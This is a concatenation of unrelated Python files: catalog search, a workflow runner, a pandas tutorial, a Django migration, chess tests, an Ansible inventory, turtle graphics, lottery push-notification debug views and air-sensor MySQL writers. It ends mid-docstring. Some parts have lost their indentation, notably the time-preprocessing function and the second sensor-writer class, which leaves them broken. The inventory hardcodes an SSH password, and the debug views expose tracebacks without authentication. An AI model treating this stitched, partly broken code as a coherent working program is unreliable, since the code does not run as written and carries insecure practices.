    def search(self, query, sort_index=None, limit=None, sort_type=None,
               reverse=False, names=None, with_size=False):
        """ search for records
        """
        records = self.soup.lazy(query, sort_index=sort_index, limit=limit,
            sort_type=sort_type, reverse=reverse, names=names,
            with_size=with_size)
        app = IRapidoApplication(self.context)
        for record in records:
            # soup.lazy() yields callables; record() resolves the record.
            yield getMultiAdapter((record(), app), IRecord)

    def records(self):
        # Iterate every stored record, each wrapped as IRecord via get().
        for key in self.soup.data.keys():
            yield self.get(key)

    def rebuild(self):
        # Rebuild the catalog from scratch.
        self.soup.rebuild()

    def clear(self):
        # Remove all records from the soup.
        self.soup.clear()

    def reindex(self, record=None):
        """Reindex one record when given, otherwise the whole soup."""
        if record:
            self.soup.reindex(records=[record.context])
        else:
            self.soup.reindex()

    @property
    def indexes(self):
        # Names of the catalog's indexes.
        return self.soup.catalog.keys()

    def create_index(self, fieldname, indextype):
        """Add a 'field', 'keyword' or 'text' index on ``fieldname``.

        Unknown index types are silently ignored.
        """
        catalog = self.soup.catalog
        field_indexer = NodeAttributeIndexer(fieldname)
        if indextype == 'field':
            catalog[fieldname] = CatalogFieldIndex(field_indexer)
        elif indextype == 'keyword':
            catalog[fieldname] = CatalogKeywordIndex(field_indexer)
        elif indextype == 'text':
            catalog[fieldname] = CatalogTextIndex(field_indexer)
|
# Greet the user by the name they type in.
user_name = input("What is your name? ")
print(f'Hi {user_name} welcome to class.')
print(f'Hello {user_name}! welcome.')
from lib.workflow.workflow_parser import WorkflowParser
from lib.workflow.job_factory import JobFactory
from lib.workflow.job_scheduler import JobScheduler
import time
class WorkflowRunner:
    """
    Runs the jobs specified in workflow file.

    NOTE: Python 2 module (print statements, ``except Exception, e``).
    """

    def __init__(self, filesystem, job_submission):
        """
        Creates new instance of WorkflowRunner.
        :param filesystem: Service for performing operations of filesystem.
        :param job_submission: Service for submitting jobs.
        """
        self._parser = WorkflowParser()
        self._job_factory = JobFactory(filesystem, job_submission)
        self._job_scheduler = JobScheduler()

    def run(self, file_path):
        """
        Runs jobs from workflow file.
        Jobs are scheduled according to PARENT/CHILD relationships from
        workflow file. If job fails, it's re-run after 5 seconds.
        If second attempt also fails, execution of the workflow stops.
        :param file_path: Path to the workflow file.
        :returns List of unfinished jobs.
        """
        parsed_jobs, self._relations = self._parser.parse(file_path)
        self._create_jobs(parsed_jobs)
        self._schedule_jobs()
        return self._run_jobs()

    def _create_jobs(self, parsed_jobs):
        # Build Job objects, silently skipping malformed entries that are
        # missing a command or its arguments.
        self._jobs = []
        for name, cmd, args in parsed_jobs:
            if cmd is None or args is None:
                continue
            self._jobs.append(self._job_factory.create_job(name, cmd, args))

    def _schedule_jobs(self):
        # Order jobs so parents run before their children.
        self._scheduled_jobs = self._job_scheduler.schedule(self._jobs,
                                                            self._relations)

    def _run_jobs(self):
        # Execute jobs front to back; stop at the first job that fails both
        # attempts. Whatever remains queued is reported as unfinished.
        while len(self._scheduled_jobs) > 0:
            if not self._run_scheduled_job():
                break
            self._scheduled_jobs.pop(0)
        return [job.name for job in self._scheduled_jobs]

    def _run_scheduled_job(self):
        """
        Run a job, in case of a failure retry after 5 seconds.
        """
        job = self._scheduled_jobs[0]
        if self._execute(job):
            return True
        else:
            print "Retrying to run the job in 5 seconds..."
            time.sleep(5)
            return self._execute(job)

    def _execute(self, job):
        # Returns True when the job's command ran without raising.
        success = False
        try:
            print "Running job: %s" % job.name
            job.execute_command()
            success = True
        except Exception, e:
            print "Job %s failed (%s)." % (job.name, str(e))
        return success
|
import pandas as pd
import numpy as np

# Tutorial script (Python 2): motivates pandas.Series by first hand-rolling
# a "series" as parallel index/data lists plus a name.
ser = {
    'index': [0, 1, 2, 3],
    'data': [145, 142, 38, 13],
    'name': 'songs'
}


def get(ser, idx):
    # Find idx in the parallel 'index' list and return the matching datum.
    value_idx = ser['index'].index(idx)
    return ser['data'][value_idx]


print get(ser, 1)
print get(ser, 3)

# The same hand-rolled structure works with string labels too.
songs = {
    'index': ['Paul', 'John', 'George', 'Ringo'],
    'data': [145, 142, 38, 13],
    'name': 'counts'
}
print get(songs, 'John')

# The real thing: a Series with the default integer index...
songs2 = pd.Series([145, 142, 38, 13],
    name='counts');
print songs2

# ...and one with an explicit string index.
songs3 = pd.Series([145, 142, 38, 13],
    name='counts',
    index=['Paul', 'John', 'George', 'Ringo'])
print songs3
print songs3.index


class Foo:
    pass


# A Series can hold heterogeneous objects (dtype becomes object).
ringo = pd.Series(
    ['Richard', 'Starkey', 13, Foo()],
    name='ringo')
print ringo

# None is stored as NaN; count() ignores missing values.
nan_ser = pd.Series([2, None],
    index=['Ono', 'Clapton'])
print nan_ser
print nan_ser.count()

# Series vs raw numpy array: similar positional indexing and reductions.
numpy_ser = np.array([145, 142, 38, 13])
print songs3[1]
print numpy_ser[1]
print songs3.mean()
print numpy_ser.mean()

mask = songs3 > songs3.median()  # boolean array
|
import json, requests, uuid, time, subprocess
from datetime import datetime
from lxml import etree

# Python 2 script: run the ami-regex company tagger over a list of input
# files/URLs and push every regex hit into a local Elasticsearch index.
urls = open('anadarko','r')                            # one input per line
regexurl = 'company_tagger.xml'                        # AMI regex definition
target = 'http://localhost:9200/contentmine/fact/'     # ES document endpoint

# Dead code deliberately disabled as a string literal: bulk-delete of
# previously indexed "berlin" facts.
'''try:
    toremove = requests.get(target + '_search?size=1000000&q=berlin.exact:"yes"').json()
    print 'deleting ', toremove['hits']['total']
    for r in toremove['hits']['hits']:
        if 'id' in r['_source'] and r['_source']['id']:
            requests.delete(target + str(r['_source']['id']))
except:
    pass'''

counter = 0      # input lines processed
ranonurls = 0    # inputs AMI was invoked on (.htm/.xml only)
amisuccess = 0   # AMI runs that produced no stderr output
hitscore = 0     # facts pushed to Elasticsearch
failures = []    # inputs whose AMI run wrote to stderr

for url in urls:
    counter += 1
    url = url.strip().replace('\n','')
    print counter, url
    # call AMI on the url if it is an htm or xml
    if url.endswith('.htm') or url.endswith('.xml'):
        ranonurls += 1
        # run AMI on the file
        co = [
            'ami-regex',
            '-i',
            url,
            '-g',
            regexurl
        ]
        p = subprocess.Popen(co, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = p.communicate()
        if err:
            # Any stderr output counts as a failed run.
            failures.append(url)
            print err
        else:
            amisuccess += 1
            # find and read the output file
            # NOTE(review): AMI writes results to a fixed path, so parallel
            # runs would overwrite each other -- assumes single-threaded use.
            outputfile = 'target/null.xml/results.xml'
            ns = etree.FunctionNamespace("http://www.xml-cml.org/ami")
            ns.prefix = "zf"
            tree = etree.parse(outputfile)
            hits = tree.xpath('//zf:hit')
            for hit in hits:
                hitscore += 1
                doc = {
                    'retrieved_by': 'ami-regex-berlin',
                    'retrieved_date': datetime.now().strftime("%Y-%m-%d %H%M")
                }
                # Surrounding context of the regex match.
                doc["pre"] = hit.get("pre")
                doc["fact"] = hit.get("word")
                doc["post"] = hit.get("post")
                doc['id'] = uuid.uuid4().hex
                doc['file'] = url
                doc['berlin'] = 'yes'
                doc['company'] = 'yes'
                # Keyword extraction of the match context via external service.
                doc['keywords'] = requests.get('http://cottagelabs.com/parser?blurb="' + doc['pre'] + ' ' + doc['fact'] + ' ' + doc['post'] + '"').json()
                requests.post(target + str(doc['id']), data=json.dumps(doc))
                time.sleep(0.05)  # throttle the ES writes

print ranonurls, amisuccess
print hitscore
print len(failures)
# Generated by Django 2.1.7 on 2019-03-12 14:56
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration (Django 2.1.7): add ``month`` and ``year``
    fields to the budget ``Statement`` model, both defaulting to 0."""

    dependencies = [
        ('budget', '0010_auto_20190311_1852'),
    ]

    operations = [
        migrations.AddField(
            model_name='statement',
            name='month',
            field=models.PositiveSmallIntegerField(default=0, verbose_name='Month'),
        ),
        migrations.AddField(
            model_name='statement',
            name='year',
            field=models.PositiveSmallIntegerField(default=0, verbose_name='Year'),
        ),
    ]
|
import tkinter as tk
import unittest
import sys
import os
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + '/../../src')
from board import Board
from pieces.pawn import Pawn
from pieces.bishop import Bishop
from pieces.king import King
from game_state import *
class BoardTest(unittest.TestCase):
    """Tests for Board; each test builds a fresh board inside its own
    Toplevel window, so a Tk display is required to run them."""

    def test_populate_grid(self):
        # After population the square map must not be empty.
        board = Board(tk.Toplevel())
        board.populate_grid()
        self.assertNotEqual(board.squares, {})

    def test_board_lock(self):
        # Acting on an unselected piece locks the board; acting on a
        # selected piece while locked releases the lock.
        board = Board(tk.Toplevel())
        b = Bishop('white', 'white_bishop_1')
        board.handle_board_lock(b, 0, 0)
        self.assertTrue(board.lock)
        b.selected = True
        board.lock = True
        board.handle_board_lock(b, 0, 0)
        self.assertFalse(board.lock)

    def test_handle_piece_movimentation(self):
        # Moving the piece at (0,4) to (0,3) must update
        # GameState.blackcoord -- presumably (0,4) holds the black king in
        # the initial setup; TODO confirm against Board's initialisation.
        board = Board(tk.Toplevel())
        k = board.squares[(0,4)]['piece']
        k.selected = True
        board.handle_piece_movimentation(k, 0, 3, (0,4))
        self.assertEqual(GameState.blackcoord, (0, 3))

    def test_clear_square(self):
        # Clearing a pawn's possible-move highlights empties the selection.
        board = Board(tk.Toplevel())
        p = board.squares[(1,1)]['piece']
        board.clear_square(p, p.get_possible_moves((1,1), board.squares))
        self.assertEqual([], board.selsquare)
# Question: https://www.hackerrank.com/challenges/coin-change/problem
# Python 2. Count the ways to make amount n using unlimited coins of m kinds.
n,m = map(int, raw_input().split())
coins = list(map(int, raw_input().split()))
# sol[i][j] = number of ways to form amount j using only the first i coins.
sol = [[0 for x in range(n+1)] for y in range(m+1)]
for i in range(1,m+1):
    for j in range(1,n+1):
        # Ways that do not use coin i at all.
        sol[i][j]+=sol[i-1][j]
        # One extra way when j can be paid with coin i alone.
        if j%coins[i-1]==0:
            sol[i][j]+=1
        # k coins of type i plus any combination of the earlier coins for
        # the remaining amount.
        k=1
        while j-k*coins[i-1]>0:
            sol[i][j]+=sol[i-1][j-k*coins[i-1]]
            k+=1
print sol[m][n]
|
#!/usr/bin/python
import json, sys, getopt
# Static Ansible dynamic-inventory script (Python 2): emits one hard-coded
# "tomcat-servers" host when invoked with --list.
conf = {'tomcat-servers': {
    'ansible_ssh_host': '127.0.0.1',
    'ansible_ssh_port': 22,
#    'ansible_ssh_private_key_file': '~/.vagrant.d/insecure_private_key',
    'ansible_ssh_user': 'vagrant',
    'ansible_ssh_pass': 'vagrant',
    'ansible_sudo': True
}}


def main(args):
    # Ansible calls inventory scripts with --list (the --host <name> form is
    # not implemented here).
    if len(args) == 1 and args[0] == '--list':
        print json.dumps(conf)
    # NOTE(review): original indentation is ambiguous; exiting after the
    # check matches the script's observable behaviour either way.
    sys.exit()


if __name__ == "__main__":
    main(sys.argv[1:])

#vagrant ansible_ssh_host=127.0.0.1 ansible_ssh_port=2222 ansible_ssh_private_key_file=~/.vagrant.d/insecure_private_key ansible_ssh_user=vagrant ansible_sudo=true
|
from turtle import Turtle, done
class GeometryTurtle(Turtle):
    """Turtle with convenience methods for drawing simple closed shapes.

    Implements the former ``TODO`` stub: ``main`` below calls make_square,
    make_rectangle, make_triangle and make_star, so each is provided here.
    Every shape turns through a multiple of 360 degrees, leaving the turtle
    at its starting position and heading.
    """

    def make_rectangle(self, width, height):
        """Draw a ``width`` x ``height`` rectangle from the current position."""
        for _ in range(2):
            self.forward(width)
            self.right(90)
            self.forward(height)
            self.right(90)

    def make_square(self, size):
        """Draw a square with sides of length ``size``."""
        self.make_rectangle(size, size)

    def make_triangle(self, size):
        """Draw an equilateral triangle with sides of length ``size``."""
        for _ in range(3):
            self.forward(size)
            self.right(120)

    def make_star(self, size):
        """Draw a five-pointed star with edges of length ``size``
        (144-degree exterior turns)."""
        for _ in range(5):
            self.forward(size)
            self.right(144)
def main():
    """Draw a square, six rotated squares, a rectangle, a triangle and a
    star, hopping 70 steps (pen up) between shapes."""
    pen = GeometryTurtle()

    def hop():
        # Reposition without drawing a connecting line.
        pen.penup()
        pen.forward(70)
        pen.pendown()

    pen.make_square(50)
    hop()
    for _ in range(6):
        pen.right(60)
        pen.make_square(30)
    hop()
    pen.make_rectangle(50, 20)
    hop()
    pen.make_triangle(50)
    hop()
    pen.make_star(49)
    # The call to the function `done` from the `turtle` module means that
    # you have to close the window manually.
    done()


if __name__ == '__main__':
    main()
|
import random
from yoolotto.lottery.models import LotteryTicket, LotteryDraw,LotteryCountryDivision
from django.views.generic import View
from django.http.response import HttpResponse
from yoolotto.lottery.tasks import notify_draw_result_all
from yoolotto.lottery.enumerations import EnumerationManager
from yoolotto.user.models import YooLottoUser
'''
Examples:-
(find tickets of draw)
http://IP:PORT/lottery/manual_notification/find_tickets?of_draw=7808
(find user of ticket)
http://IP:PORT/lottery/manual_notification/find_user?of_ticket=12990
http://IP:PORT/lottery/manual_notification/last_user
(send notification for ticket id directly)
http://IP:PORT/lottery/manual_notification?for_ticket=33370
OR
(send notification for all tickets of draw )
http://IP:PORT/lottery/manual_notification?for_draw=7808
'''
#specially taken for sending to iphone, integer instead of remote_id
# Map of US state remote_ids to the small integer codes the iOS client
# expects in notification payloads (Android receives the raw remote_id).
# NOTE(review): code 1 is absent (TX=0, CA=2) and several states are
# missing entirely -- presumably intentional; confirm before renumbering.
state_codes={
    "TX":0,
    "CA":2,
    "AZ":3,
    "AR":4,
    "CO":5,
    "CT":6,
    "DE":7,
    "DC":8,
    "FL":9,
    "GA":10,
    "ID":11,
    "IL":12,
    "IN":13,
    "IA":14,
    "KS":15,
    "KY":16,
    "LA":17,
    "ME":18,
    "MD":19,
    "MA":20,
    "MI":21,
    "MN":22,
    "MO":23,
    "MT":24,
    "NE":25,
    "NH":26,
    "NJ":27,
    "NM":28,
    "NY":29,
    "NC":30,
    "ND":31,
    "OH":32,
    "OK":33,
    "OR":34,
    "PA":35,
    "RI":36,
    "SC":37,
    "SD":38,
    "TN":39,
    "VT":40,
    "VA":41,
    "WA":42,
    "WI":43,
    "WV":44,
    "WY":45
    }
class ManualNotification(View):
    """Debug endpoint that manually (re)sends notifications.

    GET params: ``type`` (result|frenzy, default result) and the integer
    ids ``for_draw``, ``for_ticket``, ``for_user`` (0 = unset). See the
    module docstring for example URLs. Python 2 module.
    """

    def get(self,request):
        notification_type=request.GET.get('type','result')
        for_draw=int(request.GET.get('for_draw','0'))
        for_ticket=int(request.GET.get('for_ticket','0'))
        for_user=int(request.GET.get('for_user','0'))
        result=""
        if notification_type=='result':
            # Prefer a single ticket when it exists, else the whole draw.
            if LotteryTicket.objects.filter(id=for_ticket).exists():
                result=notify_draw_result_for_ticket(for_ticket)
            elif LotteryDraw.objects.filter(id=for_draw).exists():
                result=notify_draw_result_all(for_draw)
        else:
            # "frenzy" path: jackpot teaser for a user without a ticket.
            try:
                #if YooLottoUser.objects.filter(id=for_user).exists():
                user = YooLottoUser.objects.get(id=for_user)
                draw=LotteryDraw.objects.get(id=for_draw)
                component_name = draw.component.name
                draw_value = "{:,}".format(draw.jackpot)
                game_type = EnumerationManager.game_reverse(draw.component.parent.pk)
                result=notify_frenzy_for_user_without_ticket(component_name, draw_value, game_type, user.id,draw.id)
            except Exception,e:
                # Report the full traceback in the HTTP response (debug tool).
                import traceback
                result=str(traceback.format_exc())
        return HttpResponse("TYPE (result / frenzy) = "+str(notification_type)+"<br>" \
            "for_draw = "+str(for_draw if for_draw else "NOT FOUND")+"<br>" \
            "for_ticket = "+str(for_ticket if for_ticket else "NOT FOUND")+"<br>" \
            "for_user = "+str(for_user if for_user else "NOT FOUND")+"<br>" \
            "----------------------------------<br>"+\
            result+"<br><br>"\
            )

    def post(self,request):
        return HttpResponse(" IDIOT ")
class FindTickets(View):
    """Debug endpoint: count and list the tickets of a draw (?of_draw=<id>)."""

    def get(self,request):
        of_draw=request.GET.get('of_draw','')
        total=0
        tickets=None
        last=None
        if not of_draw:
            return HttpResponse("!! of_draw not provided !!")
        if LotteryDraw.objects.filter(id=of_draw).exists():
            if LotteryTicket.objects.filter(draw__id=int(of_draw)).exists():
                total=LotteryTicket.objects.filter(draw__id=int(of_draw)).count()
            # NOTE(review): this repeats the exists() check above; original
            # indentation is ambiguous, kept as two sibling checks.
            if LotteryTicket.objects.filter(draw__id=int(of_draw)).exists():
                tickets=LotteryTicket.objects.filter(draw__id=int(of_draw)).values('pk')
                last=LotteryTicket.objects.filter(draw__id=int(of_draw)).order_by('-id')[0].id
        else:
            return HttpResponse("!! INVALID DRAW ID !!")
        result="Total = "+str(total)+"<br>" \
            "Tickets Found ="+str(tickets)+"<br>" \
            "Last ticket ="+str(last)
        return HttpResponse(result)

    def post(self,request):
        return HttpResponse(" IDIOT ")
class FindUser(View):
    """Debug endpoint: look up the owner of a ticket (?of_ticket=<id>)."""

    def get(self, request):
        of_ticket = request.GET.get('of_ticket', '')
        user_id = None
        if not of_ticket:
            return HttpResponse("!! of_ticket not provided !!")
        if LotteryTicket.objects.filter(id=of_ticket).exists():
            user_id = LotteryTicket.objects.get(id=of_ticket).user.id
        else:
            return HttpResponse("!! INVALID TICKET ID !!")
        # BUG FIX: the original ended this expression with a trailing "\"
        # line continuation immediately before "return", which is a
        # SyntaxError. Implicit string concatenation inside parentheses
        # builds the intended response text instead.
        result = (" User ID = " + str(user_id) + "<br>"
                  " For Ticket =" + str(of_ticket) + "<br>")
        return HttpResponse(result)

    def post(self, request):
        return HttpResponse(" IDIOT ")
class FindLastUser(View):
    """Debug endpoint: report the newest user id and the total user count."""

    def get(self, request):
        #of_ticket=request.GET.get('of_ticket','')
        HELP_TEXT = " >>> Ensure no one is hitting ,this time ! <<< "
        total_user = "NOT FOUND"
        user_id = "NOT FOUND"
        try:
            user_id = YooLottoUser.objects.order_by('-id')[0].id
            total_user = YooLottoUser.objects.count()
        except Exception as e:
            # Surface the DB error in the response (debug tool).
            HELP_TEXT = str(e)
        # BUG FIX: the original ended this expression with a trailing "\"
        # line continuation immediately before "return", which is a
        # SyntaxError. Implicit string concatenation inside parentheses
        # builds the intended response text instead.
        result = (" <br> " + str(HELP_TEXT) + " <br>"
                  " Total Users = " + str(total_user) + "<br>"
                  " Last User ID = " + str(user_id) + "<br>")
        return HttpResponse(result)

    def post(self, request):
        return HttpResponse(" IDIOT ")
def notify_draw_result_all(draw_id):
    """Send a result notification for every ticket of ``draw_id`` that still
    has unchecked submissions; returns the concatenated per-ticket logs
    (each prefixed with a blank line)."""
    from yoolotto.lottery.models import LotteryTicket
    rows = LotteryTicket.objects.filter(
        draw_id=int(draw_id), submissions__checked=False).values("pk")
    combined = ''
    # De-duplicate: the submissions join can yield the same ticket twice.
    for ticket_pk in set(row["pk"] for row in rows):
        combined = combined + "\n\n" + notify_draw_result_for_ticket(ticket_pk)
    return combined
def notify_draw_result_for_ticket(ticket_id):
    """Push a "results available" notification to every device of the
    ticket's owner.

    Returns a text log of what was sent, or None when the ticket does not
    exist or the user opted out of draw notifications. Python 2 module.
    """
    from yoolotto.lottery.models import LotteryTicket
    from yoolotto.communication.apn import APNSender
    from yoolotto.communication.gcm_sender import GCMSender
    try:
        ticket = LotteryTicket.objects.get(pk=int(ticket_id))
    except:
        # Unknown ticket: nothing to notify.
        return
    if not ticket.user.preferences.jackpot_drawing:
        # User opted out of draw-result notifications.
        return
    log = ""
    log += "\nTicket: " + str(ticket.pk)
    text = "Results available for %s" % ticket.draw.component.name
    log += "\n" + text
    for device in ticket.user.devices.all():
        if not device.device_token:
            log += "\nSkipped Device, No Token"
            continue
        if device.is_ios():
            # iOS payload carries the integer state code (see state_codes).
            apn = APNSender(device.device_token, text=text,
                custom={"code": "draw", "drawId": ticket.draw.pk,"state":state_codes[ticket.division.remote_id]})
            print apn.send()
            log += "\nAPN Outbound: %s" % device.device_token
        elif device.is_android():
            # Android receives the raw remote_id plus the ticket id.
            gcm = GCMSender(to=[device.device_token], data={"text": text,
                "code": "draw", "drawId": ticket.draw.pk,
                "state":ticket.division.remote_id,
                "ticket_id":ticket.id
                })
            print gcm.send()
            log += "\nGCM Outbound: %s" % device.device_token
    #ticket.notified = True
    # NOTE(review): original indentation is ambiguous; saving once after the
    # device loop -- confirm it was not meant to run per device.
    ticket.save()
    return log
def notify_frenzy_for_user_without_ticket(component_name, draw_value, game_type,user_id,draw_id):
    """Send jackpot "frenzy" notifications for a draw to a user who holds no
    ticket for it; returns a text log of everything sent."""
    from yoolotto.communication.apn import APNSender
    from yoolotto.communication.gcm_sender import GCMSender
    state=LotteryDraw.objects.get(id=draw_id).division.remote_id
    # reducing multiple frenzies notification for any user ,
    # based on user old hits for states in history
    # and also sending duplicate notification for state TX and game_type in 0/1 Megamillion/Powerball
    old_states=[str(_state) for _state in set(YooLottoUser.objects.get(id=user_id).tickets.values_list('division__remote_id',flat=True))]
    send_for_states=[]
    log=""
    if (not old_states and state=="TX"):
        # User with no ticket history: only Texas frenzies are sent.
        send_for_states.append("TX")
    elif (state in old_states):
        send_for_states.append(state)
    else:
        log += "\nDevice auto skipped ,assume unnecessary state: %s" % state
    if old_states and state=="TX" and game_type in [0,1]: # 0/Megamillion(TX),1/Powerball(TX):
        #send duplicate notification for state that user has already played
        [send_for_states.append(i) for i in old_states if i!="CA"]
    send_for_states=list(set(send_for_states))
    for _index,right_state in enumerate(send_for_states):#loop for duplicate notification
        if right_state!="TX" and len(send_for_states) > 1:
            log += "\n Send duplicate notification for state: %s" % right_state
        user = YooLottoUser.objects.get(pk=int(user_id))
        log += "\nUser: " + str(user.pk)
        state_name=LotteryCountryDivision.objects.get(remote_id=right_state).name.title()
        text = "%s %s Jackpot is %s!" % (state_name,component_name, draw_value)
        log += "\n" + text
        for device in user.devices.all():
            if not device.device_token:
                log += "\nSkipped Device, No Token"
                continue
            if device.is_ios():
                # iOS payload carries the integer state code (see state_codes).
                apn = APNSender(device.device_token, text=text,
                    custom={"code": "frenzy", "gameType": game_type,
                    "state":state_codes[right_state],
                    "drawId":draw_id
                    })
                apn.send()
                log += "\nAPN Outbound: %s" % device.device_token
            elif device.is_android():
                # draw_id is offset by the loop index, presumably so duplicate
                # Android notifications are not collapsed client-side -- TODO
                # confirm.
                gcm = GCMSender(to=[device.device_token], data={"text": text,
                    "code": "frenzy", "gameType": game_type,
                    "state":right_state,
                    "draw_id":draw_id+_index
                    })
                gcm.send()
                log += "\nGCM Outbound: %s" % device.device_token
        log += "\n ---------------------------- \n"
    return log
# draw_id=-1
# print LotteryTicket.objects.filter(draw_id=int(draw_id)).count()
# print LotteryTicket.objects.filter(draw_id=int(draw_id)).last().id#values("pk")
#print notify_draw_result_for_ticket(33369)
#
# def notify_frenzy_for_user(component_name, draw_value, game_type,ticket,draw_id):
# from yoolotto.user.models import YooLottoUser
# from yoolotto.communication.apn import APNSender
# from yoolotto.communication.gcm_sender import GCMSender
#
# log = ""
# text = "%s Jackpot is %s!" % (component_name, draw_value)
# log += "\n" + text
#
# for device in ticket.user.devices.all():
# if not device.device_token:
# log += "\nSkipped Device, No Token"
# continue
#
# if device.is_ios():
# apn = APNSender(device.device_token, text=text,
# custom={"code": "frenzy", "gameType": game_type,"state":state_codes[ticket.division.remote_id]})
# apn.send()
# log += "\nAPN Outbound: %s" % device.device_token
# elif device.is_android():
# gcm = GCMSender(to=[device.device_token], data={"text": text,
# "code": "frenzy", "gameType": game_type,"state":ticket.division.remote_id,"draw_id":draw_id
# })
# gcm.send()
# log += "\nGCM Outbound: %s" % device.device_token
#
# return log
|
### Author: Lihua Pei (Neo)
### Email: lihua.peidata@gmail.edu
### Created at July 2019
#### Step 1 import Packages ######################################################################################################################################
import pymysql.cursors
import time
import pandas as pd
import numpy as np
import requests
#### Step 2 setup functions ##################################################################################################################################
# Function 1: interval helper for the 20-second uRAD API polling timer.
def sleeptime(hour, minute, sec):
    """Convert an (hour, minute, second) interval into whole seconds."""
    return 3600 * hour + 60 * minute + sec


# Poll interval: one API request every 20 seconds.
second = sleeptime(0, 0, 20)
# Function 2: Preprocess data decode time value to time_string
def Preprocessing_uRAD_API_min(_time):
time_local = time.localtime(_time)
time_string = time.strftime("%Y-%m-%d %H:%M", time_local)
time_struct = time.struct_time(time_local)
time_year = time_struct[0]
time_month = time_struct[1]
time_day = time_struct[2]
time_hour = time_struct[3]
time_minute = time_struct[4]
time_list= [time_string, time_year, time_month, time_day, time_hour, time_minute]
return time_list
# Function 3: MySQL insert function
class Minute_1A_SQL_Writer_API_updating_one():
    """Map one minute-averaged reading from uRAD unit 1400001A onto the
    ``1400001A_Minute_Average`` MySQL table.

    Args:
        df (dict): JSON payload from the uRAD API (string-keyed fields).
        cursor: open DB cursor used for the insert.
        connection: open DB connection (used for commit).

    IMPROVEMENT: the original repeated fourteen identical
    ``try: x = float(x) / except: pass`` blocks; they are replaced by the
    ``_to_float`` helper, which preserves the behaviour (unparseable or
    missing values are kept as-is, including None).
    """

    @staticmethod
    def _to_float(value):
        """Best-effort float conversion; returns the input unchanged when it
        cannot be parsed (None, garbage strings, ...)."""
        try:
            return float(value)
        except (TypeError, ValueError):
            return value

    def __init__(self, df, cursor, connection):
        self.cursor = cursor
        self.conn = connection
        self.uRAD = '1400001A'
        self.location = 'River Terrace'
        self.Time_Str_Minute = df.get('Time_Str', None)
        # Time components are required: int(None) raises, as in the original.
        self.Year = int(df.get('Year', None))
        self.Month = int(df.get('Month', None))
        self.Day = int(df.get('Day', None))
        self.Hour = int(df.get('Hour', None))
        self.Minute = int(df.get('minute', None))
        to_float = self._to_float
        # Measurements: numeric when parseable, raw API value otherwise.
        self.Particulate_Matter_PM1 = to_float(df.get('pm1', None))
        self.Particulate_Matter_PM25 = to_float(df.get('pm25', None))
        self.Particulate_Matter_PM10 = to_float(df.get('pm10', None))
        self.Ozone_O3_ppm = to_float(df.get('gas1', None))
        self.Nitrogen_Dioxide_NO2_ppm = to_float(df.get('gas2', None))
        self.Sulfer_Dioxide_SO2_ppm = to_float(df.get('gas3', None))
        self.Carbon_Monoxide_CO_ppm = to_float(df.get('gas4', None))
        self.VOC = to_float(df.get('vocaqi', None))
        self.Temperature = to_float(df.get('temperature', None))
        self.Pressure = to_float(df.get('pressure', None))
        self.Humidity = to_float(df.get('humidity', None))
        self.Noise = to_float(df.get('noise', None))
        self.latitude = to_float(df.get('latitude', None))
        self.longitude = to_float(df.get('longitude', None))

    def insert(self):
        """Insert this record and commit.

        Execution errors are printed (not raised) so one bad reading does
        not stop the polling loop; the commit still runs either way.
        """
        try:
            self.cursor.execute(self.get_insert_query(), self.get_values())
        except Exception as e:
            print(e)
        self.conn.commit()

    def get_values(self):
        """Return the 22-tuple of column values, in table column order."""
        values = (self.uRAD, self.location, self.Time_Str_Minute, self.Year, self.Month,
                  self.Day, self.Hour, self.Minute, self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
                  self.Particulate_Matter_PM10,
                  self.Ozone_O3_ppm, self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
                  self.Carbon_Monoxide_CO_ppm, self.VOC, self.Temperature, self.Pressure, self.Humidity, self.Noise, self.latitude, self.longitude)
        return values

    def get_insert_query(self):
        """Return the parameterized INSERT statement (22 placeholders)."""
        _insert = f"""INSERT INTO 1400001A_Minute_Average VALUES (%s,%s, %s, %s, %s,%s,%s, %s, %s, %s, %s, %s, %s, %s,%s,%s,%s,%s,%s,%s,%s,%s)"""
        return _insert
class Minute_18_SQL_Writer_API_updating_one():
def __init__(self,df, cursor, connection):
self.cursor = cursor
self.conn = connection
"""Load data from JSON object
Args:
user (dict) - json of object
"""
self.uRAD = '14000018'
self.location = 'River Terrace'
self.Time_Str_Minute = df.get('Time_Str',None)
self.Year = int(df.get('Year', None))
self.Month = int(df.get('Month', None))
self.Day = int(df.get('Day', None))
self.Hour = int(df.get('Hour',None))
self.Minute = int(df.get('minute',None))
self.Particulate_Matter_PM1 = df.get('pm1', None)
self.Particulate_Matter_PM25 = df.get('pm25', None)
self.Particulate_Matter_PM10 = df.get('pm10', None)
self.Ozone_O3_ppm = df.get('gas1',None)
self.Nitrogen_Dioxide_NO2_ppm = df.get('gas2',None)
self.Sulfer_Dioxide_SO2_ppm = df.get('gas3', None)
self.Carbon_Monoxide_CO_ppm = df.get('gas4', None)
self.VOC = df.get('vocaqi',None)
self.Temperature = df.get('temperature', None)
self.Pressure = df.get('pressure', None)
self.Humidity = df.get('humidity', None)
self.Noise = df.get('noise',None)
self.latitude = df.get('latitude', None)
self.longitude = df.get('longitude',None)
try:
self.Particulate_Matter_PM1 = float(self.Particulate_Matter_PM1)
except:
pass
try:
self.VOC = float(self.VOC)
except:
pass
try:
self.Particulate_Matter_PM25 = float(self.Particulate_Matter_PM25)
except:
pass
try:
self.Particulate_Matter_PM10 = float(self.Particulate_Matter_PM10)
except:
pass
try:
self.Ozone_O3_ppm = float(self.Ozone_O3_ppm)
except:
pass
try:
self.Nitrogen_Dioxide_NO2_ppm = float(self.Nitrogen_Dioxide_NO2_ppm)
except:
pass
try:
self.Sulfer_Dioxide_SO2_ppm = float(self.Sulfer_Dioxide_SO2_ppm)
except:
pass
try:
self.Carbon_Monoxide_CO_ppm = float(self.Carbon_Monoxide_CO_ppm)
except:
pass
try:
self.Temperature = float(self.Temperature)
except:
pass
try:
self.Pressure = float(self.Pressure)
except:
pass
try:
self.Humidity = float(self.Humidity)
except:
pass
try:
self.Noise = float(self.Noise)
except:
pass
try:
self.latitude = float(self.latitude)
except:
pass
try:
self.longitude = float(self.longitude)
except:
pass
def insert(self):
"""Inserts a list of objects into the given connection
Args:
objs (list) - list of SQL helper objects
"""
try:
self.cursor.execute(self.get_insert_query(), self.get_values())
except Exception as e:
print(e)
self.conn.commit()
def get_values(self):
    """Get the values used for inserting a SQL record.

    Returns:
        tuple: the 22 column values, ordered to match the
